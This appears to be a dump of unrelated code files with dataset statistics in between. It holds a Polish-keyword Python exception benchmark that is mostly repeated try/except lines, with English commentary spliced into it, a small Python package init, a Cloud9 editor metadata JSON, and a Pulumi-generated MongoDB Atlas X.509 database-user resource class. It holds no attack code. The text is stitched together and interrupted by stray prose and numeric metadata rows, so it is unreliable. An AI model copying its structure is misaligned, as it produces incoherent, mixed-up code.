spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
def calibrate(self):
dla i w range(self.rounds):
dalej
### Test to make Fredrik happy...
jeżeli __name__ == '__main__':
zaimportuj timeit
timeit.TestClass = TryRaiseExcept
timeit.main(['-s', 'test = TestClass(); test.rounds = 1000',
'test.test()'])
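This file comes from a Polish-keyword translation of CPython, so the keywords map directly to standard Python: spróbuj/podnieś/wyjąwszy/dalej are try/raise/except/pass, klasa is class, dla ... w is for ... in, jeżeli is if, and zaimportuj is import. An abbreviated standard-Python sketch of the first benchmark (the try/except pairs are repeated many more times in the original so that each round performs the advertised operation count):

from pybench import Test

class TryRaiseExcept(Test):
    version = 2.0
    operations = 2 + 3 + 3
    rounds = 80000

    def test(self):
        error = ValueError
        for i in range(self.rounds):
            try:
                raise error
            except:
                pass
            try:
                raise error("something")
            except:
                pass
            # ...repeated so each round performs the 2 + 3 + 3 raise/except operations.

    def calibrate(self):
        error = ValueError
        for i in range(self.rounds):
            pass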
| 20.97
| 64
| 0.30656
| 738
| 14,679
| 6.086721
| 0.056911
| 0.457257
| 0.694568
| 0.834817
| 0.949688
| 0.934105
| 0.934105
| 0.921193
| 0.90984
| 0.892476
| 0
| 0.005281
| 0.664623
| 14,679
| 699
| 65
| 21
| 0.90717
| 0.001976
| 0
| 0.981763
| 0
| 0
| 0.007715
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.00304
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
b547b0511d7a31d644aaaa22ae8bbb986147ee68
| 139
|
py
|
Python
|
pula/__init__.py
|
dkfulp/PULA
|
67f317a73ab57378b67f5ffdc28d8e68a18c82db
|
[
"MIT"
] | 1
|
2018-04-24T18:26:32.000Z
|
2018-04-24T18:26:32.000Z
|
pula/__init__.py
|
dkfulp/PULA
|
67f317a73ab57378b67f5ffdc28d8e68a18c82db
|
[
"MIT"
] | 1
|
2018-04-24T17:56:20.000Z
|
2018-04-24T17:56:20.000Z
|
pula/__init__.py
|
dkfulp/pula
|
67f317a73ab57378b67f5ffdc28d8e68a18c82db
|
[
"MIT"
] | null | null | null |
from pula.numeric_functions import *
from pula.file_functions import *
from pula.hack_functions import *
from pula.data_structures import *
| 34.75
| 36
| 0.834532
| 20
| 139
| 5.6
| 0.45
| 0.285714
| 0.508929
| 0.616071
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107914
| 139
| 4
| 37
| 34.75
| 0.903226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
b58029001468b92c2eba9fb2082e6ab649d380b5
| 2,706
|
py
|
Python
|
.c9/metadata/workspace/uvaschedule_me/forms.py
|
nathan-williams/uvaschedule_me
|
504733dcceca9d8ec15a467983e8b3cea1af09aa
|
[
"MIT"
] | null | null | null |
.c9/metadata/workspace/uvaschedule_me/forms.py
|
nathan-williams/uvaschedule_me
|
504733dcceca9d8ec15a467983e8b3cea1af09aa
|
[
"MIT"
] | null | null | null |
.c9/metadata/workspace/uvaschedule_me/forms.py
|
nathan-williams/uvaschedule_me
|
504733dcceca9d8ec15a467983e8b3cea1af09aa
|
[
"MIT"
] | null | null | null |
{"filter":false,"title":"forms.py","tooltip":"/uvaschedule_me/forms.py","undoManager":{"stack":[[{"start":{"row":6,"column":0},"end":{"row":6,"column":4},"action":"remove","lines":[" "],"id":2}],[{"start":{"row":5,"column":226},"end":{"row":6,"column":0},"action":"remove","lines":["",""],"id":3}],[{"start":{"row":11,"column":38},"end":{"row":11,"column":39},"action":"insert","lines":["'"],"id":4}],[{"start":{"row":11,"column":39},"end":{"row":11,"column":40},"action":"insert","lines":["a"],"id":5}],[{"start":{"row":11,"column":40},"end":{"row":11,"column":41},"action":"insert","lines":["u"],"id":6}],[{"start":{"row":11,"column":41},"end":{"row":11,"column":42},"action":"insert","lines":["t"],"id":7}],[{"start":{"row":11,"column":42},"end":{"row":11,"column":43},"action":"insert","lines":["o"],"id":8}],[{"start":{"row":11,"column":43},"end":{"row":11,"column":44},"action":"insert","lines":["f"],"id":9}],[{"start":{"row":11,"column":44},"end":{"row":11,"column":45},"action":"insert","lines":["o"],"id":10}],[{"start":{"row":11,"column":45},"end":{"row":11,"column":46},"action":"insert","lines":["c"],"id":11}],[{"start":{"row":11,"column":46},"end":{"row":11,"column":47},"action":"insert","lines":["u"],"id":12}],[{"start":{"row":11,"column":47},"end":{"row":11,"column":48},"action":"insert","lines":["s"],"id":13}],[{"start":{"row":11,"column":48},"end":{"row":11,"column":49},"action":"insert","lines":["'"],"id":14}],[{"start":{"row":11,"column":49},"end":{"row":11,"column":50},"action":"insert","lines":[":"],"id":15}],[{"start":{"row":11,"column":50},"end":{"row":11,"column":51},"action":"insert","lines":["'"],"id":16}],[{"start":{"row":11,"column":51},"end":{"row":11,"column":52},"action":"insert","lines":["t"],"id":17}],[{"start":{"row":11,"column":52},"end":{"row":11,"column":53},"action":"insert","lines":["r"],"id":18}],[{"start":{"row":11,"column":53},"end":{"row":11,"column":54},"action":"insert","lines":["u"],"id":19}],[{"start":{"row":11,"column":54},"end":{"row":11,"column":55},"action":"insert","lines":["e"],"id":20}],[{"start":{"row":11,"column":55},"end":{"row":11,"column":56},"action":"insert","lines":["'"],"id":21}],[{"start":{"row":11,"column":56},"end":{"row":11,"column":57},"action":"insert","lines":[","],"id":22}],[{"start":{"row":11,"column":57},"end":{"row":11,"column":58},"action":"insert","lines":[" "],"id":23}]],"mark":21,"position":21},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":9,"column":39},"end":{"row":9,"column":39},"isBackwards":false},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1432071634000,"hash":"d118a019da0eaab393f9e8ee50867df3349775f6"}
| 2,706
| 2,706
| 0.558758
| 391
| 2,706
| 3.86445
| 0.232737
| 0.132363
| 0.291198
| 0.21178
| 0.092654
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09515
| 0.001848
| 2,706
| 1
| 2,706
| 2,706
| 0.464272
| 0
| 0
| 0
| 0
| 0
| 0.469893
| 0.023642
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b581db92ddffc0fc1c94a0613e7a85307609b8f4
| 24,524
|
py
|
Python
|
sdk/python/pulumi_mongodbatlas/x509_authentication_database_user.py
|
pulumi/pulumi-mongodbatlas
|
0d5c085dcfd871b56fb4cf582620260b70caa07a
|
[
"ECL-2.0",
"Apache-2.0"
] | 9
|
2020-04-28T19:12:30.000Z
|
2022-03-22T23:04:46.000Z
|
sdk/python/pulumi_mongodbatlas/x509_authentication_database_user.py
|
pulumi/pulumi-mongodbatlas
|
0d5c085dcfd871b56fb4cf582620260b70caa07a
|
[
"ECL-2.0",
"Apache-2.0"
] | 59
|
2020-06-12T12:12:52.000Z
|
2022-03-28T18:14:50.000Z
|
sdk/python/pulumi_mongodbatlas/x509_authentication_database_user.py
|
pulumi/pulumi-mongodbatlas
|
0d5c085dcfd871b56fb4cf582620260b70caa07a
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-09-25T21:22:08.000Z
|
2021-08-30T20:06:18.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['X509AuthenticationDatabaseUserArgs', 'X509AuthenticationDatabaseUser']
@pulumi.input_type
class X509AuthenticationDatabaseUserArgs:
def __init__(__self__, *,
project_id: pulumi.Input[str],
customer_x509_cas: Optional[pulumi.Input[str]] = None,
months_until_expiration: Optional[pulumi.Input[int]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a X509AuthenticationDatabaseUser resource.
:param pulumi.Input[str] project_id: Identifier for the Atlas project associated with the X.509 configuration.
:param pulumi.Input[str] customer_x509_cas: PEM string containing one or more customer CAs for database user authentication.
:param pulumi.Input[int] months_until_expiration: A number of months that the created certificate is valid for before expiry, up to 24 months. By default is 3.
:param pulumi.Input[str] username: Username of the database user to create a certificate for.
"""
pulumi.set(__self__, "project_id", project_id)
if customer_x509_cas is not None:
pulumi.set(__self__, "customer_x509_cas", customer_x509_cas)
if months_until_expiration is not None:
pulumi.set(__self__, "months_until_expiration", months_until_expiration)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
Identifier for the Atlas project associated with the X.509 configuration.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="customerX509Cas")
def customer_x509_cas(self) -> Optional[pulumi.Input[str]]:
"""
PEM string containing one or more customer CAs for database user authentication.
"""
return pulumi.get(self, "customer_x509_cas")
@customer_x509_cas.setter
def customer_x509_cas(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_x509_cas", value)
@property
@pulumi.getter(name="monthsUntilExpiration")
def months_until_expiration(self) -> Optional[pulumi.Input[int]]:
"""
A number of months that the created certificate is valid for before expiry, up to 24 months. By default is 3.
"""
return pulumi.get(self, "months_until_expiration")
@months_until_expiration.setter
def months_until_expiration(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "months_until_expiration", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
"""
Username of the database user to create a certificate for.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class _X509AuthenticationDatabaseUserState:
def __init__(__self__, *,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input['X509AuthenticationDatabaseUserCertificateArgs']]]] = None,
current_certificate: Optional[pulumi.Input[str]] = None,
customer_x509_cas: Optional[pulumi.Input[str]] = None,
months_until_expiration: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering X509AuthenticationDatabaseUser resources.
:param pulumi.Input[Sequence[pulumi.Input['X509AuthenticationDatabaseUserCertificateArgs']]] certificates: Array of objects where each details one unexpired database user certificate.
:param pulumi.Input[str] current_certificate: Contains the last X.509 certificate and private key created for a database user.
:param pulumi.Input[str] customer_x509_cas: PEM string containing one or more customer CAs for database user authentication.
:param pulumi.Input[int] months_until_expiration: A number of months that the created certificate is valid for before expiry, up to 24 months. By default is 3.
:param pulumi.Input[str] project_id: Identifier for the Atlas project associated with the X.509 configuration.
:param pulumi.Input[str] username: Username of the database user to create a certificate for.
"""
if certificates is not None:
pulumi.set(__self__, "certificates", certificates)
if current_certificate is not None:
pulumi.set(__self__, "current_certificate", current_certificate)
if customer_x509_cas is not None:
pulumi.set(__self__, "customer_x509_cas", customer_x509_cas)
if months_until_expiration is not None:
pulumi.set(__self__, "months_until_expiration", months_until_expiration)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def certificates(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['X509AuthenticationDatabaseUserCertificateArgs']]]]:
"""
Array of objects where each details one unexpired database user certificate.
"""
return pulumi.get(self, "certificates")
@certificates.setter
def certificates(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['X509AuthenticationDatabaseUserCertificateArgs']]]]):
pulumi.set(self, "certificates", value)
@property
@pulumi.getter(name="currentCertificate")
def current_certificate(self) -> Optional[pulumi.Input[str]]:
"""
Contains the last X.509 certificate and private key created for a database user.
"""
return pulumi.get(self, "current_certificate")
@current_certificate.setter
def current_certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "current_certificate", value)
@property
@pulumi.getter(name="customerX509Cas")
def customer_x509_cas(self) -> Optional[pulumi.Input[str]]:
"""
PEM string containing one or more customer CAs for database user authentication.
"""
return pulumi.get(self, "customer_x509_cas")
@customer_x509_cas.setter
def customer_x509_cas(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_x509_cas", value)
@property
@pulumi.getter(name="monthsUntilExpiration")
def months_until_expiration(self) -> Optional[pulumi.Input[int]]:
"""
A number of months that the created certificate is valid for before expiry, up to 24 months. By default is 3.
"""
return pulumi.get(self, "months_until_expiration")
@months_until_expiration.setter
def months_until_expiration(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "months_until_expiration", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
Identifier for the Atlas project associated with the X.509 configuration.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
"""
Username of the database user to create a certificate for.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
class X509AuthenticationDatabaseUser(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
customer_x509_cas: Optional[pulumi.Input[str]] = None,
months_until_expiration: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
`X509AuthenticationDatabaseUser` provides a X509 Authentication Database User resource. The X509AuthenticationDatabaseUser resource lets you manage MongoDB users who authenticate using X.509 certificates. You can manage these X.509 certificates or let Atlas do it for you.
| Management | Description |
|---|---|
| Atlas | Atlas manages your Certificate Authority and can generate certificates for your MongoDB users. No additional X.509 configuration is required. |
| Customer | You must provide a Certificate Authority and generate certificates for your MongoDB users. |
> **NOTE:** Groups and projects are synonymous terms. You may find group_id in the official documentation.
## Example Usage
### Example Usage: Generate an Atlas-managed X.509 certificate for a MongoDB user
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
user = mongodbatlas.DatabaseUser("user",
project_id="<PROJECT-ID>",
username="myUsername",
x509_type="MANAGED",
database_name="$external",
roles=[mongodbatlas.DatabaseUserRoleArgs(
role_name="atlasAdmin",
database_name="admin",
)],
labels=[mongodbatlas.DatabaseUserLabelArgs(
key="My Key",
value="My Value",
)])
test = mongodbatlas.X509AuthenticationDatabaseUser("test",
project_id=user.project_id,
username=user.username,
months_until_expiration=2)
```
### Example Usage: Save a customer-managed X.509 configuration for an Atlas project
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
test = mongodbatlas.X509AuthenticationDatabaseUser("test",
customer_x509_cas=\"\"\" -----BEGIN CERTIFICATE-----
MIICmTCCAgICCQDZnHzklxsT9TANBgkqhkiG9w0BAQsFADCBkDELMAkGA1UEBhMC
VVMxDjAMBgNVBAgMBVRleGFzMQ8wDQYDVQQHDAZBdXN0aW4xETAPBgNVBAoMCHRl
c3QuY29tMQ0wCwYDVQQLDARUZXN0MREwDwYDVQQDDAh0ZXN0LmNvbTErMCkGCSqG
SIb3DQEJARYcbWVsaXNzYS5wbHVua2V0dEBtb25nb2RiLmNvbTAeFw0yMDAyMDQy
MDQ2MDFaFw0yMTAyMDMyMDQ2MDFaMIGQMQswCQYDVQQGEwJVUzEOMAwGA1UECAwF
VGV4YXMxDzANBgNVBAcMBkF1c3RpbjERMA8GA1UECgwIdGVzdC5jb20xDTALBgNV
BAsMBFRlc3QxETAPBgNVBAMMCHRlc3QuY29tMSswKQYJKoZIhvcNAQkBFhxtZWxp
c3NhLnBsdW5rZXR0QG1vbmdvZGIuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQCf1LRqr1zftzdYx2Aj9G76tb0noMPtj6faGLlPji1+m6Rn7RWD9L0ntWAr
cURxvypa9jZ9MXFzDtLevvd3tHEmfrUT3ukNDX6+Jtc4kWm+Dh2A70Pd+deKZ2/O
Fh8audEKAESGXnTbeJCeQa1XKlIkjqQHBNwES5h1b9vJtFoLJwIDAQABMA0GCSqG
SIb3DQEBCwUAA4GBADMUncjEPV/MiZUcVNGmktP6BPmEqMXQWUDpdGW2+Tg2JtUA
7MMILtepBkFzLO+GlpZxeAlXO0wxiNgEmCRONgh4+t2w3e7a8GFijYQ99FHrAC5A
iul59bdl18gVqXia1Yeq/iK7Ohfy/Jwd7Hsm530elwkM/ZEkYDjBlZSXYdyz
-----END CERTIFICATE-----"
\"\"\",
project_id="<PROJECT-ID>")
```
## Import
X.509 Certificates for a User can be imported using project ID and username, in the format `project_id-username`, e.g.
```sh
$ pulumi import mongodbatlas:index/x509AuthenticationDatabaseUser:X509AuthenticationDatabaseUser test 1112222b3bf99403840e8934-myUsername
```
        For more information see [MongoDB Atlas API Reference](https://docs.atlas.mongodb.com/reference/api/x509-configuration-get-certificates/). The current X.509 configuration can be imported using the project ID alone, in the format `project_id`, e.g.
```sh
$ pulumi import mongodbatlas:index/x509AuthenticationDatabaseUser:X509AuthenticationDatabaseUser test 1112222b3bf99403840e8934
```
        For more information see [MongoDB Atlas API Reference](https://docs.atlas.mongodb.com/reference/api/x509-configuration-get-certificates/).
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] customer_x509_cas: PEM string containing one or more customer CAs for database user authentication.
        :param pulumi.Input[int] months_until_expiration: Number of months the created certificate remains valid before it expires, up to 24 months. Defaults to 3.
:param pulumi.Input[str] project_id: Identifier for the Atlas project associated with the X.509 configuration.
:param pulumi.Input[str] username: Username of the database user to create a certificate for.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: X509AuthenticationDatabaseUserArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
        `X509AuthenticationDatabaseUser` provides an X.509 Authentication Database User resource, which lets you manage MongoDB users who authenticate using X.509 certificates. You can manage these certificates yourself or let Atlas do it for you.
| Management | Description |
|---|---|
| Atlas | Atlas manages your Certificate Authority and can generate certificates for your MongoDB users. No additional X.509 configuration is required. |
| Customer | You must provide a Certificate Authority and generate certificates for your MongoDB users. |
> **NOTE:** Groups and projects are synonymous terms. You may find group_id in the official documentation.
## Example Usage
### Example Usage: Generate an Atlas-managed X.509 certificate for a MongoDB user
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
user = mongodbatlas.DatabaseUser("user",
project_id="<PROJECT-ID>",
username="myUsername",
x509_type="MANAGED",
database_name="$external",
roles=[mongodbatlas.DatabaseUserRoleArgs(
role_name="atlasAdmin",
database_name="admin",
)],
labels=[mongodbatlas.DatabaseUserLabelArgs(
key="My Key",
value="My Value",
)])
test = mongodbatlas.X509AuthenticationDatabaseUser("test",
project_id=user.project_id,
username=user.username,
months_until_expiration=2)
```
### Example Usage: Save a customer-managed X.509 configuration for an Atlas project
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
test = mongodbatlas.X509AuthenticationDatabaseUser("test",
customer_x509_cas=\"\"\" -----BEGIN CERTIFICATE-----
MIICmTCCAgICCQDZnHzklxsT9TANBgkqhkiG9w0BAQsFADCBkDELMAkGA1UEBhMC
VVMxDjAMBgNVBAgMBVRleGFzMQ8wDQYDVQQHDAZBdXN0aW4xETAPBgNVBAoMCHRl
c3QuY29tMQ0wCwYDVQQLDARUZXN0MREwDwYDVQQDDAh0ZXN0LmNvbTErMCkGCSqG
SIb3DQEJARYcbWVsaXNzYS5wbHVua2V0dEBtb25nb2RiLmNvbTAeFw0yMDAyMDQy
MDQ2MDFaFw0yMTAyMDMyMDQ2MDFaMIGQMQswCQYDVQQGEwJVUzEOMAwGA1UECAwF
VGV4YXMxDzANBgNVBAcMBkF1c3RpbjERMA8GA1UECgwIdGVzdC5jb20xDTALBgNV
BAsMBFRlc3QxETAPBgNVBAMMCHRlc3QuY29tMSswKQYJKoZIhvcNAQkBFhxtZWxp
c3NhLnBsdW5rZXR0QG1vbmdvZGIuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQCf1LRqr1zftzdYx2Aj9G76tb0noMPtj6faGLlPji1+m6Rn7RWD9L0ntWAr
cURxvypa9jZ9MXFzDtLevvd3tHEmfrUT3ukNDX6+Jtc4kWm+Dh2A70Pd+deKZ2/O
Fh8audEKAESGXnTbeJCeQa1XKlIkjqQHBNwES5h1b9vJtFoLJwIDAQABMA0GCSqG
SIb3DQEBCwUAA4GBADMUncjEPV/MiZUcVNGmktP6BPmEqMXQWUDpdGW2+Tg2JtUA
7MMILtepBkFzLO+GlpZxeAlXO0wxiNgEmCRONgh4+t2w3e7a8GFijYQ99FHrAC5A
iul59bdl18gVqXia1Yeq/iK7Ohfy/Jwd7Hsm530elwkM/ZEkYDjBlZSXYdyz
        -----END CERTIFICATE-----
\"\"\",
project_id="<PROJECT-ID>")
```
## Import
X.509 Certificates for a User can be imported using project ID and username, in the format `project_id-username`, e.g.
```sh
$ pulumi import mongodbatlas:index/x509AuthenticationDatabaseUser:X509AuthenticationDatabaseUser test 1112222b3bf99403840e8934-myUsername
```
        For more information see [MongoDB Atlas API Reference](https://docs.atlas.mongodb.com/reference/api/x509-configuration-get-certificates/). The current X.509 configuration can be imported using the project ID alone, in the format `project_id`, e.g.
```sh
$ pulumi import mongodbatlas:index/x509AuthenticationDatabaseUser:X509AuthenticationDatabaseUser test 1112222b3bf99403840e8934
```
        For more information see [MongoDB Atlas API Reference](https://docs.atlas.mongodb.com/reference/api/x509-configuration-get-certificates/).
:param str resource_name: The name of the resource.
:param X509AuthenticationDatabaseUserArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(X509AuthenticationDatabaseUserArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
customer_x509_cas: Optional[pulumi.Input[str]] = None,
months_until_expiration: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = X509AuthenticationDatabaseUserArgs.__new__(X509AuthenticationDatabaseUserArgs)
__props__.__dict__["customer_x509_cas"] = customer_x509_cas
__props__.__dict__["months_until_expiration"] = months_until_expiration
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
__props__.__dict__["username"] = username
__props__.__dict__["certificates"] = None
__props__.__dict__["current_certificate"] = None
super(X509AuthenticationDatabaseUser, __self__).__init__(
'mongodbatlas:index/x509AuthenticationDatabaseUser:X509AuthenticationDatabaseUser',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['X509AuthenticationDatabaseUserCertificateArgs']]]]] = None,
current_certificate: Optional[pulumi.Input[str]] = None,
customer_x509_cas: Optional[pulumi.Input[str]] = None,
months_until_expiration: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None) -> 'X509AuthenticationDatabaseUser':
"""
Get an existing X509AuthenticationDatabaseUser resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['X509AuthenticationDatabaseUserCertificateArgs']]]] certificates: Array of objects, each describing one unexpired database user certificate.
:param pulumi.Input[str] current_certificate: Contains the last X.509 certificate and private key created for a database user.
:param pulumi.Input[str] customer_x509_cas: PEM string containing one or more customer CAs for database user authentication.
        :param pulumi.Input[int] months_until_expiration: Number of months the created certificate remains valid before it expires, up to 24 months. Defaults to 3.
:param pulumi.Input[str] project_id: Identifier for the Atlas project associated with the X.509 configuration.
:param pulumi.Input[str] username: Username of the database user to create a certificate for.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _X509AuthenticationDatabaseUserState.__new__(_X509AuthenticationDatabaseUserState)
__props__.__dict__["certificates"] = certificates
__props__.__dict__["current_certificate"] = current_certificate
__props__.__dict__["customer_x509_cas"] = customer_x509_cas
__props__.__dict__["months_until_expiration"] = months_until_expiration
__props__.__dict__["project_id"] = project_id
__props__.__dict__["username"] = username
return X509AuthenticationDatabaseUser(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def certificates(self) -> pulumi.Output[Sequence['outputs.X509AuthenticationDatabaseUserCertificate']]:
"""
        Array of objects, each describing one unexpired database user certificate.
"""
return pulumi.get(self, "certificates")
@property
@pulumi.getter(name="currentCertificate")
def current_certificate(self) -> pulumi.Output[str]:
"""
Contains the last X.509 certificate and private key created for a database user.
"""
return pulumi.get(self, "current_certificate")
@property
@pulumi.getter(name="customerX509Cas")
def customer_x509_cas(self) -> pulumi.Output[Optional[str]]:
"""
PEM string containing one or more customer CAs for database user authentication.
"""
return pulumi.get(self, "customer_x509_cas")
@property
@pulumi.getter(name="monthsUntilExpiration")
def months_until_expiration(self) -> pulumi.Output[Optional[int]]:
"""
        Number of months the created certificate remains valid before it expires, up to 24 months. Defaults to 3.
"""
